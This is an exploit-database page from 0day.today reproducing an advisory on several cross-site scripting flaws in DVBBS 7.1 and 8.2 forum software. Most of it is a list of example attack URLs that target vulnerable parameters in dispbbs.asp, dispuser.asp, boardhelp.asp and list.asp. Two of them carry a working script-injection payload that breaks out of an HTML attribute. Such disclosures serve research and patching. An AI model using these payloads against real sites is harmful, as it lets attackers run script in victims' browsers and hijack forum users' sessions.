[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DVBBS Multiple Cross Site Scripting Vulnerabilities

Author
Lostmon
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11206
Category
web applications
Date add
08-03-2010
Platform
unsorted
===================================================
DVBBS Multiple Cross Site Scripting Vulnerabilities
===================================================

Remote:  	 Yes 
Credit:  	 lostmon is credited with the discovery of this vulnerability.
Vulnerable: 	Dvbbs Dvbbs 8.2
Dvbbs Dvbbs 7.1 Sp2
Dvbbs Dvbbs 7.1 

An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

Examples have been provided:

http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]
http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://www.example.com/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= 

http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="><script>alert(/liscker/);</script>
http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=><script>alert(/liscker/);</script>



#  0day.today [2024-12-26]  #